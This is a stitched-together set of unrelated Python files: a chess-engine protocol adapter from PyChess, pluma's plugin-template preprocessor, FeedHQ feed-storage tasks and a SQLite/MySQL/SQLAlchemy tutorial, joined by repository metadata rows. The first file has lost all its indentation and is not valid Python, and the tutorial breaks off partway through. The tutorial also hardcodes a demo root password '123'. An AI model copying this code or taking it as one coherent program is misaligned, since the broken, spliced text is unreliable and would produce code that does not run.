self.__sendAnalyze(self.mode == INVERSE_ANALYZING)
create_task(coro())
@asyncio.coroutine
def makeMove(self, board1, move, board2):
""" Gets a move from the engine (for player engines).
@param board1: The current board
@param move: The last move made
@param board2: The board before the last move was made
@return: The move the engine decided to make
"""
log.debug("makeMove: move=%s self.movenext=%s board1=%s board2=%s self.board=%s" % (
move, self.movenext, board1, board2, self.board), extra={"task": self.defname})
assert self.readyMoves
if self.board == board1 or not board2 or self.movenext:
self.board = board1
self.__tellEngineToPlayCurrentColorAndMakeMove()
self.movenext = False
else:
self.board = board1
self.__usermove(board2, move)
if self.engineIsInNotPlaying:
self.__tellEngineToPlayCurrentColorAndMakeMove()
self.waitingForMove = True
self.readyForMoveNowCommand = True
# Parse outputs
status = yield from self.queue.get()
if status == "not ready":
log.warning(
"Engine seems to be protover=2, but is treated as protover=1",
extra={"task": self.defname})
status = yield from self.queue.get()
if status == "ready":
status = yield from self.queue.get()
if status == "invalid":
raise InvalidMove
if status == "del" or status == "die":
raise PlayerIsDead("Killed by foreign forces")
if status == "int":
raise TurnInterrupt
self.waitingForMove = False
self.readyForMoveNowCommand = False
assert isinstance(status, Move), status
return status
def updateTime(self, secs, opsecs):
if self.features["time"]:
print("time %s" % int(secs * 100 * self.timeHandicap),
file=self.engine)
print("otim %s" % int(opsecs * 100), file=self.engine)
# Standard options
def setOptionAnalyzing(self, mode):
self.mode = mode
def setOptionInitialBoard(self, model):
@asyncio.coroutine
def coro():
yield from self.ready_moves_event.wait()
# We don't use the optionQueue here, as set board prints a whole lot of
# stuff. Instead we just call it.
self.setBoardList(model.boards[:], model.moves[:])
create_task(coro())
def setBoardList(self, boards, moves):
# Notice: If this method is to be called while playing, the engine will
# need 'new' and an arrangement similar to that of 'pause' to avoid
# the current thought move to appear
if self.mode not in (ANALYZING, INVERSE_ANALYZING):
self.__tellEngineToStopPlayingCurrentColor()
self.__setBoard(boards[0])
self.board = boards[-1]
for board, move in zip(boards[:-1], moves):
self.__usermove(board, move)
if self.mode in (ANALYZING, INVERSE_ANALYZING):
self.board = boards[-1]
if self.mode == INVERSE_ANALYZING:
self.board = self.board.switchColor()
            # The caller of setBoardList will have to repost/analyze the
# analyzer engines at this point.
def setOptionVariant(self, variant):
if self.features["variants"] is None:
log.warning("setOptionVariant: engine doesn't support variants",
extra={"task": self.defname})
return
if variant in variants.values() and not variant.standard_rules:
assert variant.cecp_name in self.features["variants"], \
"%s doesn't support %s variant" % (self, variant.cecp_name)
self.optionQueue.append("variant %s" % variant.cecp_name)
# Strength system #
# Strength Depth Ponder Time handicap #
# 1 1 o 1,258% #
# 2 2 o 1,584% #
# 3 3 o 1.995% #
# #
# 19 o x 79,43% #
# 20 o x o #
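    # For example, strength 10 yields a time handicap of
    # 0.01 * 10 ** (10 / 10.) = 0.10, i.e. the engine is told it has 10%
    # of the real clock; strength 1 and 19 give the 1,258% and 79,43%
    # rows shown above.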
def setOptionStrength(self, strength, forcePonderOff):
self.strength = strength
if strength <= 19:
self.__setTimeHandicap(0.01 * 10 ** (strength / 10.))
if strength <= 18:
self.__setDepth(strength)
        # Crafty offers 100 skill levels
        if "crafty" in self.features["myname"].lower() and strength <= 19:
            self.optionQueue.append("skill %s" % (strength * 5))
self.__setPonder(strength >= 19 and not forcePonderOff)
if strength == 20:
if "gaviota" in self.features["egt"]:
self.optionQueue.append("egtpath gaviota %s" % conf.get("egtb_path"))
else:
self.optionQueue.append("random")
def __setDepth(self, depth):
self.optionQueue.append("sd %d" % depth)
def __setTimeHandicap(self, timeHandicap):
self.timeHandicap = timeHandicap
def __setPonder(self, ponder):
if ponder:
self.optionQueue.append("hard")
else:
self.optionQueue.append("hard")
self.optionQueue.append("easy")
def setOptionTime(self, secs, gain, moves):
# Notice: In CECP we apply time handicap in updateTime, not in
# setOptionTime.
minutes = int(secs / 60)
secs = int(secs % 60)
mins = str(minutes)
if secs:
mins += ":" + str(secs)
self.optionQueue.append("level %s %s %d" % (moves, mins, gain))
# Option handling
def setOption(self, key, value):
""" Set an option, which will be sent to the engine, after the
'readyForOptions' signal has passed.
If you want to know the possible options, you should go to
engineDiscoverer or use the hasOption method
while you are in your 'readyForOptions' signal handler """
if self.readyMoves:
log.warning(
"Options set after 'readyok' are not sent to the engine",
extra={"task": self.defname})
if key == "cores":
self.optionQueue.append("cores %s" % value)
elif key == "memory":
self.optionQueue.append("memory %s" % value)
elif key.lower() == "ponder":
self.__setPonder(value == 1)
else:
self.optionQueue.append("option %s=%s" % (key, value))
# Interacting with the player
def pause(self):
""" Pauses engine using the "pause" command if available. Otherwise put
engine in force mode. By the specs the engine shouldn't ponder in
force mode, but some of them do so anyways. """
log.debug("pause: self=%s" % self, extra={"task": self.defname})
if self.isAnalyzing():
self.__stop_analyze()
self.analyzing_paused = True
else:
self.engine.pause()
return
def resume(self):
log.debug("resume: self=%s" % self, extra={"task": self.defname})
if self.isAnalyzing():
self.__sendAnalyze(self.mode == INVERSE_ANALYZING)
self.analyzing_paused = False
else:
self.engine.resume()
return
def hurry(self):
log.debug("hurry: self.waitingForMove=%s self.readyForMoveNowCommand=%s" % (
self.waitingForMove, self.readyForMoveNowCommand), extra={"task": self.defname})
if self.waitingForMove and self.readyForMoveNowCommand:
self.__tellEngineToMoveNow()
self.readyForMoveNowCommand = False
def spectatorUndoMoves(self, moves, gamemodel):
if self.analyzing_paused:
return
log.debug("spectatorUndoMoves: moves=%s gamemodel.ply=%s gamemodel.boards[-1]=%s self.board=%s" % (
moves, gamemodel.ply, gamemodel.boards[-1], self.board), extra={"task": self.defname})
for i in range(moves):
print("undo", file=self.engine)
self.board = gamemodel.boards[-1]
def playerUndoMoves(self, moves, gamemodel):
log.debug("CECPEngine.playerUndoMoves: moves=%s self=%s gamemodel.curplayer=%s" %
(moves, self, gamemodel.curplayer), extra={"task": self.defname})
self.board = gamemodel.boards[-1]
self.__tellEngineToStopPlayingCurrentColor()
for i in range(moves):
print("undo", file=self.engine)
if gamemodel.curplayer != self and moves % 2 == 1 or \
(gamemodel.curplayer == self and moves % 2 == 0):
# Interrupt if we were searching, but should no longer do so
log.debug("CECPEngine.playerUndoMoves: putting TurnInterrupt into self.move_queue %s" % self.name, extra={"task": self.defname})
self.queue.put_nowait("int")
# Offer handling
def offer(self, offer):
if offer.type == DRAW_OFFER:
if self.features["draw"]:
print("draw", file=self.engine)
else:
self.emit("accept", offer)
def offerError(self, offer, error):
if self.features["draw"]:
# We don't keep track if engine draws are offers or accepts. We just
# Always assume they are accepts, and if they are not, we get this
# error and emit offer instead
if offer.type == DRAW_OFFER and error == ACTION_ERROR_NONE_TO_ACCEPT:
self.emit("offer", Offer(DRAW_OFFER))
# Internal
def __usermove(self, board, move):
if self.features["usermove"]:
self.engine.write("usermove ")
if self.features["san"]:
print(toSAN(board, move), file=self.engine)
else:
castle_notation = CASTLE_KK
if board.variant == FISCHERRANDOMCHESS:
castle_notation = CASTLE_SAN
print(
toAN(board,
move,
short=True,
castleNotation=castle_notation),
file=self.engine)
def __tellEngineToMoveNow(self):
if self.features["sigint"]:
self.engine.sigint()
print("?", file=self.engine)
def __tellEngineToStopPlayingCurrentColor(self):
print("force", file=self.engine)
self.engineIsInNotPlaying = True
def __tellEngineToPlayCurrentColorAndMakeMove(self):
self.__printColor()
print("go", file=self.engine)
self.engineIsInNotPlaying = False
def __stop_analyze(self):
if self.engineIsAnalyzing:
print("exit", file=self.engine)
# Some engines (crafty, gnuchess) doesn't respond to exit command
# we try to force them to stop with an empty board fen
print("setboard 8/8/8/8/8/8/8/8 w - - 0 1", file=self.engine)
self.engineIsAnalyzing = False
def __sendAnalyze(self, inverse=False):
if inverse and self.board.board.opIsChecked():
# Many engines don't like positions able to take down enemy
# king. Therefore we just return the "kill king" move
            # automatically
self.emit("analyze", [(self.board.ply, [toAN(
self.board, getMoveKillingKing(self.board))], MATE_VALUE - 1, "1", "")])
return
print("post", file=self.engine)
print("analyze", file=self.engine)
self.engineIsAnalyzing = True
if not conf.get("infinite_analysis"):
loop = asyncio.get_event_loop()
loop.call_later(conf.get("max_analysis_spin"), self.__stop_analyze)
def __printColor(self):
if self.features["colors"]: # or self.mode == INVERSE_ANALYZING:
if self.board.color == WHITE:
print("white", file=self.engine)
else:
print("black", file=self.engine)
def __setBoard(self, board):
if self.features["setboard"]:
self.__tellEngineToStopPlayingCurrentColor()
fen = board.asFen(enable_bfen=False)
if self.mode == INVERSE_ANALYZING:
fen_arr = fen.split()
if not self.board.board.opIsChecked():
if fen_arr[1] == "b":
fen_arr[1] = "w"
else:
fen_arr[1] = "b"
fen = " ".join(fen_arr)
print("setboard %s" % fen, file=self.engine)
else:
# Kludge to set black to move, avoiding the troublesome and now
# deprecated "black" command. - Equal to the one xboard uses
self.__tellEngineToStopPlayingCurrentColor()
if board.color == BLACK:
print("a2a3", file=self.engine)
print("edit", file=self.engine)
print("#", file=self.engine)
for color in WHITE, BLACK:
for y_loc, row in enumerate(board.data):
for x_loc, piece in row.items():
if not piece or piece.color != color:
continue
sign = reprSign[piece.sign]
cord = repr(Cord(x_loc, y_loc))
print(sign + cord, file=self.engine)
print("c", file=self.engine)
print(".", file=self.engine)
# Parsing
@asyncio.coroutine
def parseLine(self, proc):
while True:
line = yield from wait_signal(proc, 'line')
if not line:
break
else:
line = line[1]
if line[0:1] == "#":
# Debug line which we shall ignore as specified in CECPv2 specs
continue
# log.debug("__parseLine: line=\"%s\"" % line.strip(), extra={"task":self.defname})
parts = whitespaces.split(line.strip())
if parts[0] == "pong":
self.lastpong = int(parts[1])
continue
# Illegal Move
if parts[0].lower().find("illegal") >= 0:
log.warning("__parseLine: illegal move: line=\"%s\", board=%s" % (
line.strip(), self.board), extra={"task": self.defname})
if parts[-2] == "sd" and parts[-1].isdigit():
print("depth", parts[-1], file=self.engine)
continue
# A Move (Perhaps)
if self.board:
if parts[0] == "move":
movestr = parts[1]
# Old Variation
elif d_plus_dot_expr.match(parts[0]) and parts[1] == "...":
movestr = parts[2]
else:
movestr = False
if movestr:
self.waitingForMove = False
self.readyForMoveNowCommand = False
if self.engineIsInNotPlaying:
# If engine was set in pause just before the engine sent its
# move, we ignore it. However the engine has to know that we
# ignored it, and thus we step it one back
log.info("__parseLine: Discarding engine's move: %s" %
movestr,
extra={"task": self.defname})
print("undo", file=self.engine)
continue
else:
try:
move = parseAny(self.board, movestr)
except ParsingError:
self.invalid_move = movestr
log.info(
"__parseLine: ParsingError engine move: %s %s"
% (movestr, self.board),
extra={"task": self.defname})
self.end(WHITEWON if self.board.color == BLACK else
BLACKWON, WON_ADJUDICATION)
continue
if validate(self.board, move):
self.board = None
self.queue.put_nowait(move)
continue
else:
self.invalid_move = movestr
log.info(
"__parseLine: can't validate engine move: %s %s"
% (movestr, self.board),
extra={"task": self.defname})
self.end(WHITEWON if self.board.color == BLACK else
BLACKWON, WON_ADJUDICATION)
continue
# Analyzing
if self.engineIsInNotPlaying:
if parts[:4] == ["0", "0", "0", "0"]:
# Crafty doesn't analyze until it is out of book
print("book off", file=self.engine)
continue
match = anare.match(line)
if match:
depth, score, time, nodes, moves = match.groups()
if "mat" in score.lower() or "#" in moves:
# Will look either like -Mat 3 or Mat3
scoreval = MATE_VALUE
if score.startswith('-'):
scoreval = -scoreval
else:
scoreval = int(score)
nps = str(int(int(nodes) / (int(time) / 100))) if int(time) > 0 else ""
mvstrs = movere.findall(moves)
if mvstrs:
self.emit("analyze", [(self.board.ply, mvstrs, scoreval, depth.strip(), nps)])
continue
# Offers draw
if parts[0:2] == ["offer", "draw"]:
self.emit("accept", Offer(DRAW_OFFER))
continue
# Resigns
if parts[0] == "resign" or \
(parts[0] == "tellics" and parts[1] == "resign"): # buggy crafty
# Previously: if "resign" in parts,
# however, this is too generic, since "hint", "bk",
# "feature option=.." and possibly other, future CECPv2
# commands can validly contain the word "resign" without this
# being an intentional resign offer.
self.emit("offer", Offer(RESIGNATION))
continue
# if parts[0].lower() == "error":
# continue
# Tell User Error
if parts[0] == "tellusererror":
# We don't want to see our stop analyzer hack as an error message
if "8/8/8/8/8/8/8/8" in "".join(parts[1:]):
continue
# Create a non-modal non-blocking message dialog with the error:
dlg = Gtk.MessageDialog(mainwindow(),
flags=0,
type=Gtk.MessageType.WARNING,
buttons=Gtk.ButtonsType.CLOSE,
message_format=None)
# Use the engine name if already known, otherwise the defname:
displayname = self.name
if not displayname:
displayname = self.defname
# Compose the dialog text:
dlg.set_markup(GObject.markup_escape_text(_(
"The engine %s reports an error:") % displayname) + "\n\n" +
GObject.markup_escape_text(" ".join(parts[1:])))
# handle response signal so the "Close" button works:
dlg.connect("response", lambda dlg, x: dlg.destroy())
dlg.show_all()
continue
# Tell Somebody
if parts[0][:4] == "tell" and \
parts[0][4:] in ("others", "all", "ics", "icsnoalias"):
log.info("Ignoring tell %s: %s" %
(parts[0][4:], " ".join(parts[1:])))
continue
if "feature" in parts:
# Some engines send features after done=1, so we will iterate after done=1 too
done1 = False
# We skip parts before 'feature', as some engines give us lines like
# White (1) : feature setboard=1 analyze...e="GNU Chess 5.07" done=1
parts = parts[parts.index("feature"):]
for i, pair in enumerate(parts[1:]):
# As "parts" is split with no thoughs on quotes or double quotes
# we need to do some extra handling.
if pair.find("=") < 0:
continue
key, value = pair.split("=", 1)
if key not in self.features:
continue
if value.startswith('"') and value.endswith('"'):
value = value[1:-1]
# If our pair was unfinished, like myname="GNU, we search the
                        # rest of the pairs for a quotation mark.
elif value[0] == '"':
rest = value[1:] + " " + " ".join(parts[2 + i:])
j = rest.find('"')
if j == -1:
log.warning("Missing endquotation in %s feature",
extra={"task": self.defname})
value = rest
else:
value = rest[:j]
elif value.isdigit():
value = int(value)
if key in self.supported_features:
print("accepted %s" % key, file=self.engine)
else:
print("rejected %s" % key, file=self.engine)
if key == "done":
if value == 1:
done1 = True
continue
elif value == 0:
log.info("Adds %d seconds timeout" % TIME_OUT_SECOND,
extra={"task": self.defname})
# This'll buy you some more time
self.queue.put_nowait("not ready")
break
if key == "smp" and value == 1:
self.options["cores"] = {"name": "cores",
"type": "spin",
"default": 1,
"min": 1,
"max": 64}
elif key == "memory" and value == 1:
self.options["memory"] = {"name": "memory",
"type": "spin",
"default": 32,
"min": 1,
"max": 4096}
elif key == "option" and key != "done":
option = self.__parse_option(value)
self.options[option["name"]] = option
else:
self.features[key] = value
if key == "myname" and not self.name:
self.setName(value)
if done1:
# Start a new game before using the engine:
# (CECPv2 engines)
print("new", file=self.engine)
# We are now ready for play:
self.emit("readyForOptions")
self.emit("readyForMoves")
self.queue.put_nowait("ready")
# A hack to get better names in protover 1.
            # Unfortunately it won't work for now, as we don't read any lines from
# protover 1 engines. When should we stop?
if self.protover == 1:
if self.defname[0] in ''.join(parts):
basis = self.defname[0]
name = ' '.join(itertools.dropwhile(
lambda part: basis not in part, parts))
self.features['myname'] = name
if not self.name:
self.setName(name)
def __parse_option(self, option):
if " -check " in option:
name, value = option.split(" -check ")
return {"type": "check", "name": name, "default": bool(int(value))}
elif " -spin " in option:
name, value = option.split(" -spin ")
defv, minv, maxv = value.split()
return {"type": "spin",
"name": name,
"default": int(defv),
"min": int(minv),
"max": int(maxv)}
elif " -slider " in option:
name, value = option.split(" -slider ")
defv, minv, maxv = value.split()
return {"type": "spin",
"name": name,
"default": int(defv),
"min": int(minv),
"max": int(maxv)}
elif " -string " in option:
name, value = option.split(" -string ")
return {"type": "text", "name": name, "default": value}
elif " -file " in option:
name, value = option.split(" -file ")
return {"type": "text", "name": name, "default": value}
elif " -path " in option:
name, value = option.split(" -path ")
return {"type": "text", "name": name, "default": value}
elif " -combo " in option:
name, value = option.split(" -combo ")
choices = list(map(str.strip, value.split("///")))
default = ""
for choice in choices:
if choice.startswith("*"):
index = choices.index(choice)
default = choice[1:]
choices[index] = default
break
return {"type": "combo",
"name": name,
"default": default,
"choices": choices}
elif " -button" in option:
pos = option.find(" -button")
return {"type": "button", "name": option[:pos]}
elif " -save" in option:
pos = option.find(" -save")
return {"type": "button", "name": option[:pos]}
elif " -reset" in option:
pos = option.find(" -reset")
return {"type": "button", "name": option[:pos]}
# Info
def canAnalyze(self):
assert self.ready, "Still waiting for done=1"
return self.features["analyze"]
def getAnalysisLines(self):
return 1
def minAnalysisLines(self):
return 1
def maxAnalysisLines(self):
return 1
def requestMultiPV(self, setting):
return 1
def __repr__(self):
if self.name:
return self.name
return self.features["myname"]
| gpl-3.0 | 7,185,567,614,037,482,000 | 39.054545 | 140 | 0.489459 | false |
mate-desktop/pluma | tools/preprocessor.py | 1 | 5353 | # -*- coding: utf-8 -*-
# preprocessor.py - simple preprocessor for plugin template files
# This file is part of pluma
#
# Copyright (C) 2006 - Steve Frécinaux
# Copyright (C) 2012-2021 MATE Developers
#
# pluma is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or
# (at your option) any later version.
#
# pluma is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with pluma; if not, write to the Free Software
# Foundation, Inc., 51 Franklin St, Fifth Floor,
# Boston, MA 02110-1301 USA
import sys
import re
class DeepnessException(Exception):
def __init__(self):
Exception.__init__(self)
statements = [re.compile("^##\s*%s\s*$" % pattern) for pattern in
['(?P<stmt>ifdef|ifndef)\s+(?P<key>[^\s]+)',
'(?P<stmt>elif|if)\s+(?P<expr>.+)',
'(?P<stmt>else|endif)',
'(?P<stmt>define)\s+(?P<key>[^\s]+)(\s+(?P<val>.+))?',
'(?P<stmt>undef)\s+(?P<key>[^\s]+)']]
variable = re.compile("##\((?P<name>[a-zA-Z_][a-zA-Z0-9_]*)(?P<mods>(\.[a-z]+)+)?\)")
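# Illustrative template fragment (added annotation, not part of the original
# tool): with macros = {'PLUGIN_NAME': 'my_plugin'}, the input
#   ##ifdef PLUGIN_NAME
#   Plugin class: ##(PLUGIN_NAME.camel)
#   ##endif
# is emitted as "Plugin class: MyPlugin"; the ##ifdef/##endif directive lines
# themselves are never written to the output.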
def _eval(expr, macros):
return eval(expr,
{'defined': lambda x: macros.has_key(x)},
macros)
def _subvar(match, macros):
name = match.group('name')
if name in macros:
val = str(macros[name])
if val is None:
return ''
else:
return ''
mods = match.group('mods')
if mods is not None:
for mod in mods[1:].split('.'):
if mod == 'lower':
val = val.lower()
elif mod == 'upper':
val = val.upper()
elif mod == 'camel':
val = ''.join(i.capitalize()
for i in val.split('_'))
return val
def process(infile = sys.stdin, outfile = sys.stdout, macros = {}):
if not isinstance(infile, file):
infile = open(infile, mode = 'r')
close_infile = True
else:
close_infile = False
if not isinstance(outfile, file):
outfile = open(outfile, mode = 'w')
close_outfile = True
else:
close_outfile = False
deepness = 0
writing_disabled = None
for line in infile:
# Skip comments
if line[0:3].lower() == '##c':
continue
# Check whether current line is a preprocessor directive
for statement in statements:
match = statement.match(line)
if match: break
if match is not None:
stmt = match.group('stmt')
if stmt == "define":
if writing_disabled is None:
key = match.group('key')
val = match.group('val')
macros[key] = val
elif stmt == "undef":
if writing_disabled is None:
key = match.group('key')
if key in macros:
del macros[key]
elif stmt == "ifdef":
deepness += 1
if writing_disabled is None and \
match.group('key') not in macros:
writing_disabled = deepness
elif stmt == "ifndef":
deepness += 1
if writing_disabled is None and \
match.group('key') in macros:
writing_disabled = deepness
elif stmt == "if":
deepness += 1
if writing_disabled is None and \
not _eval(match.group('expr'), macros):
writing_disabled = deepness
elif stmt == "elif":
if deepness == 0:
raise DeepnessException()
if writing_disabled is None and \
not _eval(match.group('expr'), macros):
writing_disabled = deepness
elif writing_disabled == deepness:
writing_disabled = None
elif stmt == "else":
if deepness == 0:
raise DeepnessException()
if writing_disabled is None:
writing_disabled = deepness
elif writing_disabled == deepness:
writing_disabled = None
elif stmt == "endif":
if deepness == 0:
raise DeepnessException()
if writing_disabled is not None and \
writing_disabled == deepness:
writing_disabled = None
deepness -= 1
# Do variable substitution in the remaining lines
elif writing_disabled is None:
outfile.write(re.sub(variable,
lambda m: _subvar(m, macros),
line))
if deepness != 0:
raise DeepnessException()
if close_infile: infile.close()
if close_outfile: outfile.close()
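# A minimal usage sketch (hypothetical file names and macro values, not part of
# the original script):
#
#     process('plugin.desktop.in', 'plugin.desktop', {'PLUGIN_NAME': 'example'})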
# ex:ts=4:et:
| gpl-2.0 | 851,380,180,004,629,900 | 32.037037 | 85 | 0.508969 | false |
feedhq/feedhq | feedhq/feeds/tasks.py | 1 | 8652 | from collections import defaultdict
from datetime import timedelta
import requests
import structlog
from django.conf import settings
from django.utils import timezone
from django_push.subscriber.models import Subscription, SubscriptionError
from rache import schedule_job
from requests.exceptions import MissingSchema
from rq.timeouts import JobTimeoutException
from .. import es
from ..profiles.models import User
from ..utils import get_redis_connection
logger = structlog.get_logger(__name__)
# TODO remove unused request_timeout
def update_feed(url, etag=None, modified=None, subscribers=1,
request_timeout=10, backoff_factor=1, error=None, link=None,
title=None, hub=None):
from .models import UniqueFeed
try:
UniqueFeed.objects.update_feed(
url, etag=etag, last_modified=modified, subscribers=subscribers,
backoff_factor=backoff_factor, previous_error=error, link=link,
title=title, hub=hub)
except JobTimeoutException:
backoff_factor = min(UniqueFeed.MAX_BACKOFF,
backoff_factor + 1)
logger.info("job timed out, backing off",
url=url, backoff_factor=backoff_factor)
schedule_job(url, schedule_in=UniqueFeed.delay(backoff_factor),
backoff_factor=backoff_factor,
connection=get_redis_connection())
except BaseException as e:
logger.info("fatal job exception", url=url, exc_info=e)
raise
def read_later(user_id, entry_pk):
user = User.objects.get(pk=user_id)
entry = es.entry(user, entry_pk, annotate_results=False)
entry.user = user
entry.read_later()
def update_favicon(feed_url, force_update=False):
from .models import Favicon
Favicon.objects.update_favicon(feed_url, force_update=force_update)
def ensure_subscribed(topic_url, hub_url):
"""Makes sure the PubSubHubbub subscription is verified"""
if settings.TESTS:
if str(type(requests.post)) != "<class 'unittest.mock.MagicMock'>":
raise ValueError("Not Mocked")
if hub_url is None:
return
log = logger.bind(topic_url=topic_url, hub_url=hub_url)
call, args = None, ()
try:
s = Subscription.objects.get(topic=topic_url, hub=hub_url)
except Subscription.DoesNotExist:
log.info("subscribing")
call = Subscription.objects.subscribe
args = topic_url, hub_url
else:
if (
not s.verified or
s.lease_expiration < timezone.now() + timedelta(days=1)
):
log.info("renewing subscription", subscription=s.pk)
call = s.subscribe
if call is not None:
try:
call(*args)
except SubscriptionError as e:
log.info("subscription error", exc_info=e)
except MissingSchema:
pass
def should_skip(date, ttl):
delta = timedelta(days=ttl)
return date + delta < timezone.now()
def store_entries(feed_url, entries):
from .models import Entry, Feed
feeds = Feed.objects.select_related('user').filter(
url=feed_url, user__is_suspended=False).values('pk', 'user_id',
'category_id',
'user__ttl')
guids = set([entry['guid'] for entry in entries])
es_query = [{'or': [{'term': {'feed': feed['pk']}} for feed in feeds]}]
# When we have dates, filter the query to avoid returning the whole dataset
date_generated = any([e.pop('date_generated') for e in entries])
if not date_generated:
earliest = min([entry['date'] for entry in entries])
limit = earliest - timedelta(days=1)
es_query.append({'range': {'timestamp': {'gt': limit}}})
filter_by_title = len(guids) == 1 and len(entries) > 1
if filter_by_title:
# All items have the same guid. Query by title instead.
titles = set([entry['title'] for entry in entries])
es_query.append({'or': [{'term': {'raw_title': t}} for t in titles]})
else:
es_query.append({'or': [{'term': {'guid': g}} for g in guids]})
existing = None
indices = []
for feed in feeds:
indices.append(es.user_alias(feed['user_id']))
if indices:
es.wait_for_yellow()
# Make sure guid and raw_title are not analyzed before querying
# anything. Otherwise existing entries are never matched and things
# keep being inserted.
mappings = es.client.indices.get_field_mapping(index=",".join(indices),
doc_type='entries',
field='guid,raw_title')
for mapping in mappings.values():
mapping = mapping['mappings']['entries']
for f in ['raw_title', 'guid']:
assert mapping[f]['mapping'][f]['index'] == 'not_analyzed'
existing_es = es.client.search(
index=",".join(indices),
doc_type='entries',
body={
'aggs': {
'existing': {
'filter': {'and': es_query},
'aggs': {
'feeds': {
'terms': {'field': 'feed', 'size': 0},
'aggs': {
'guids': {'terms': {'field': 'guid',
'size': 0}},
'titles': {'terms': {'field': 'raw_title',
'size': 0}},
},
},
},
},
},
},
)
existing_es = existing_es[
'aggregations']['existing']['feeds']['buckets']
else:
existing_es = []
existing_guids = defaultdict(set)
existing_titles = defaultdict(set)
if existing is not None:
for entry in existing:
existing_guids[entry['feed_id']].add(entry['guid'])
if filter_by_title:
existing_titles[entry['feed_id']].add(entry['title'])
existing_es_guids = defaultdict(set)
existing_es_titles = defaultdict(set)
for bucket in existing_es:
for sub in bucket['guids']['buckets']:
existing_es_guids[bucket['key']].add(sub['key'])
if filter_by_title:
for sub in bucket['titles']['buckets']:
existing_es_titles[bucket['key']].add(sub['key'])
ops = []
refresh_updates = defaultdict(list)
for feed in feeds:
seen_guids = set()
seen_titles = set()
for entry in entries:
if (
not filter_by_title and
entry['guid'] in existing_es_guids[feed['pk']]
):
continue
if (
filter_by_title and
entry['title'] in existing_es_titles[feed['pk']]
):
continue
if (
feed['user__ttl'] and
should_skip(entry['date'], feed['user__ttl'])
):
continue
if filter_by_title and entry['title'] in seen_titles:
continue
seen_titles.add(entry['title'])
if not filter_by_title and entry['guid'] in seen_guids:
continue
seen_guids.add(entry['guid'])
data = Entry(**entry).serialize()
data['category'] = feed['category_id']
data['feed'] = feed['pk']
data['_id'] = es.next_id()
data['id'] = data['_id']
data['_type'] = 'entries'
data['user'] = feed['user_id']
data['_index'] = settings.ES_INDEX
ops.append(data)
refresh_updates[feed['user_id']].append(entry['date'])
if ops:
es.bulk(ops, raise_on_error=True)
if settings.TESTS:
# Indices are refreshed asynchronously. Refresh immediately
# during tests.
indices = ",".join(set([doc['_index'] for doc in ops]))
es.client.indices.refresh(indices)
redis = get_redis_connection()
for user_id, dates in refresh_updates.items():
user = User(pk=user_id)
new_score = float(max(dates).strftime('%s'))
current_score = redis.zscore(user.last_update_key, feed_url) or 0
if new_score > current_score:
redis.zadd(user.last_update_key, feed_url, new_score)
| bsd-3-clause | -1,002,127,284,446,079,100 | 35.200837 | 79 | 0.537217 | false |
zmsch27/Python | PythonBase/Python_SQL.py | 1 | 5850 | #以下来自廖雪峰的Python学习之Python数据库
#SQLite////////////////////////////////////////////////////
#SQLite是一种嵌入式数据库,它的数据库就是一个文件。由于SQLite本身是C写的,而且体积很小
#所以,经常被集成到各种应用程序中,甚至在iOS和Android的App中都可以集成。
#Python就内置了SQLite3,所以,在Python中使用SQLite,不需要安装任何东西,直接使用。
# 导入SQLite驱动:
import sqlite3
# 连接到SQLite数据库
# 数据库文件是test.db
# 如果文件不存在,会自动在当前目录创建:
conn = sqlite3.connect('test.db')
# 创建一个Cursor:
cursor = conn.cursor()
# 执行一条SQL语句,创建user表:
cursor.execute('create table user (id varchar(20) primary key, name varchar(20))')
# 继续执行一条SQL语句,插入一条记录:
cursor.execute('insert into user (id, name) values (\'1\', \'Michael\')')
# 通过rowcount获得插入的行数:
print(cursor.rowcount)
# 关闭Cursor:
cursor.close()
# 提交事务:
conn.commit()
# 关闭Connection:
conn.close()
#我们再试试查询记录:
conn = sqlite3.connect('test.db')
cursor = conn.cursor()
# 执行查询语句:
cursor.execute('select * from user where id=?', ('1',))
# 获得查询结果集:
values = cursor.fetchall()
print(values)
cursor.close()
conn.close()
#使用Python的DB-API时,只要搞清楚Connection和Cursor对象,打开后一定记得关闭,就可以放心地使用。
#使用Cursor对象执行insert,update,delete语句时,执行结果由rowcount返回影响的行数,就可以拿到执行结果。
#使用Cursor对象执行select语句时,通过featchall()可以拿到结果集。结果集是一个list,每个元素都是一个tuple,对应一行记录。
#如果SQL语句带有参数,那么需要把参数按照位置传递给execute()方法,有几个?占位符就必须对应几个参数,例如:
#cursor.execute('select * from user where name=? and pwd=?', ('abc', 'password'))
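# A small sketch (not part of the original tutorial) wrapping the same parameterized
# query pattern in a helper; it assumes the user table created above exists in db_path:
def query_user_by_name(db_path, name):
    # open a short-lived connection, run the parameterized query, then clean up
    conn2 = sqlite3.connect(db_path)
    cur = conn2.cursor()
    try:
        cur.execute('select * from user where name=?', (name,))
        return cur.fetchall()
    finally:
        cur.close()
        conn2.close()
# e.g. query_user_by_name('test.db', 'Michael') returns the row inserted above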
print('-----------------------------------------\n')
#MySQL/////////////////////////////////////////////////////////////
#MySQL is the most widely used database server on the web. SQLite is lightweight and embeddable, but it cannot handle heavy concurrent access, so it suits desktop and mobile applications.
#MySQL, by contrast, is designed for the server side: it can handle heavy concurrent access, and it also uses far more memory than SQLite.
#In addition, MySQL offers several storage engines; the most commonly used one is InnoDB, which supports transactions.
# Import the MySQL driver:
import mysql.connector
# Note: set password to your own root password:
conn = mysql.connector.connect(user='root', password='123', database='python_test')
cursor = conn.cursor()
# Create the user table:
cursor.execute('create table user (id varchar(20) primary key, name varchar(20))')
# Insert one row; note that MySQL's placeholder is %s:
cursor.execute('insert into user (id, name) values (%s, %s)', ['1', 'Michael'])
print(cursor.rowcount)
# Commit the transaction:
conn.commit()
cursor.close()
# Run the query:
cursor = conn.cursor()
cursor.execute('select * from user where id = %s', ('1',))
values = cursor.fetchall()
print(values)
# Close the Cursor and the Connection:
cursor.close()
conn.close()
print('-----------------------------------------\n')
#SQLAlchemy//////////////////////////////////////////////////////////
# Imports:
from sqlalchemy import Column, String, create_engine
from sqlalchemy.orm import sessionmaker
from sqlalchemy.ext.declarative import declarative_base
# Create the base class for ORM objects:
Base = declarative_base()
# Define the User object:
class User(Base):
    # Table name:
    __tablename__ = 'user'
    # Table structure:
    id = Column(String(20), primary_key=True)
    name = Column(String(20))
# Initialize the database connection:
engine = create_engine('mysql+mysqlconnector://root:123@localhost:3306/python_test')
